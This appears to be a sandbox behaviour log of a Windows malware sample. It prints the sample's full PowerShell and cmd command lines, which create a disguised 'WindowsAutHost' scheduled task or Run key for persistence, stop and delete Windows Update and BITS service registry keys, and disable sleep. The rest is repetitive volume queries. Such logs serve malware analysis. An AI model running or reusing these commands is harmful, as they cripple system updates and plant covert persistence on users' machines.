    Source: C:\Users\user\Desktop\8iTXwpHCHb.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell <#ujtstfzc#> if((new-object security.principal.windowsprincipal([security.principal.windowsidentity]::getcurrent())).isinrole([security.principal.windowsbuiltinrole]::administrator)) { if([system.environment]::osversion.version -lt [system.version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'system' /tn 'windowsauthost' /tr '''c:\program files\windowsservices\windowsauthost'''" } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\program files\windowsservices\windowsauthost') -trigger (new-scheduledtasktrigger -atstartup) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'windowsauthost' -user 'system' -runlevel 'highest' -force; } } else { reg add "hkcu\software\microsoft\windows\currentversion\run" /v "windowsauthost" /t reg_sz /f /d 'c:\program files\windowsservices\windowsauthost' }
    Source: C:\Users\user\Desktop\8iTXwpHCHb.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell <#agjywv#> if((new-object security.principal.windowsprincipal([security.principal.windowsidentity]::getcurrent())).isinrole([security.principal.windowsbuiltinrole]::administrator)) { schtasks /run /tn "windowsauthost" } else { "c:\program files\windowsservices\windowsauthost" }
    Source: C:\Program Files\WindowsServices\WindowsAutHost | Process created: C:\Windows\System32\cmd.exe cmd /c sc stop usosvc & sc stop waasmedicsvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "hklm\system\currentcontrolset\services\usosvc" /f & reg delete "hklm\system\currentcontrolset\services\waasmedicsvc" /f & reg delete "hklm\system\currentcontrolset\services\wuauserv" /f & reg delete "hklm\system\currentcontrolset\services\bits" /f & reg delete "hklm\system\currentcontrolset\services\dosvc" /f
    Source: C:\Program Files\WindowsServices\WindowsAutHost | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell <#ujtstfzc#> if((new-object security.principal.windowsprincipal([security.principal.windowsidentity]::getcurrent())).isinrole([security.principal.windowsbuiltinrole]::administrator)) { if([system.environment]::osversion.version -lt [system.version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'system' /tn 'windowsauthost' /tr '''c:\program files\windowsservices\windowsauthost'''" } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\program files\windowsservices\windowsauthost') -trigger (new-scheduledtasktrigger -atstartup) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'windowsauthost' -user 'system' -runlevel 'highest' -force; } } else { reg add "hkcu\software\microsoft\windows\currentversion\run" /v "windowsauthost" /t reg_sz /f /d 'c:\program files\windowsservices\windowsauthost' }
    Source: C:\Users\user\Desktop\8iTXwpHCHb.exe | Process created: C:\Windows\System32\cmd.exe cmd /c sc stop usosvc & sc stop waasmedicsvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "hklm\system\currentcontrolset\services\usosvc" /f & reg delete "hklm\system\currentcontrolset\services\waasmedicsvc" /f & reg delete "hklm\system\currentcontrolset\services\wuauserv" /f & reg delete "hklm\system\currentcontrolset\services\bits" /f & reg delete "hklm\system\currentcontrolset\services\dosvc" /f
    Source: C:\Users\user\Desktop\8iTXwpHCHb.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell <#ujtstfzc#> if((new-object security.principal.windowsprincipal([security.principal.windowsidentity]::getcurrent())).isinrole([security.principal.windowsbuiltinrole]::administrator)) { if([system.environment]::osversion.version -lt [system.version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'system' /tn 'windowsauthost' /tr '''c:\program files\windowsservices\windowsauthost'''" } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\program files\windowsservices\windowsauthost') -trigger (new-scheduledtasktrigger -atstartup) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'windowsauthost' -user 'system' -runlevel 'highest' -force; } } else { reg add "hkcu\software\microsoft\windows\currentversion\run" /v "windowsauthost" /t reg_sz /f /d 'c:\program files\windowsservices\windowsauthost' }
    Source: C:\Users\user\Desktop\8iTXwpHCHb.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell <#agjywv#> if((new-object security.principal.windowsprincipal([security.principal.windowsidentity]::getcurrent())).isinrole([security.principal.windowsbuiltinrole]::administrator)) { schtasks /run /tn "windowsauthost" } else { "c:\program files\windowsservices\windowsauthost" }
    Source: C:\Program Files\WindowsServices\WindowsAutHost | Process created: C:\Windows\System32\cmd.exe cmd /c sc stop usosvc & sc stop waasmedicsvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "hklm\system\currentcontrolset\services\usosvc" /f & reg delete "hklm\system\currentcontrolset\services\waasmedicsvc" /f & reg delete "hklm\system\currentcontrolset\services\wuauserv" /f & reg delete "hklm\system\currentcontrolset\services\bits" /f & reg delete "hklm\system\currentcontrolset\services\dosvc" /f
    Source: C:\Program Files\WindowsServices\WindowsAutHost | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell <#ujtstfzc#> if((new-object security.principal.windowsprincipal([security.principal.windowsidentity]::getcurrent())).isinrole([security.principal.windowsbuiltinrole]::administrator)) { if([system.environment]::osversion.version -lt [system.version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'system' /tn 'windowsauthost' /tr '''c:\program files\windowsservices\windowsauthost'''" } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\program files\windowsservices\windowsauthost') -trigger (new-scheduledtasktrigger -atstartup) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'windowsauthost' -user 'system' -runlevel 'highest' -force; } } else { reg add "hkcu\software\microsoft\windows\currentversion\run" /v "windowsauthost" /t reg_sz /f /d 'c:\program files\windowsservices\windowsauthost' }
    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc stop UsoSvc
    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc
    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc stop wuauserv
    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc stop bits
    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc stop dosvc
    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-dc 0
    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-dc 0
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /run /tn WindowsAutHost
    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\choice.exe choice /C Y /N /D Y /T 3
    Source: C:\Program Files\WindowsServices\WindowsAutHost | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe qeiyvjdhkxdq
    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc stop UsoSvc
    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc
    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc stop wuauserv
    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc stop bits
    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc stop dosvc
    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-dc 0
    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-dc 0
    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic PATH Win32_VideoController GET Name, VideoProcessor
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0011~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0011~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00114~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0014~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0014~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00112~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00112~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0019~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0019~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0019~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0019~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0019~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0019~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
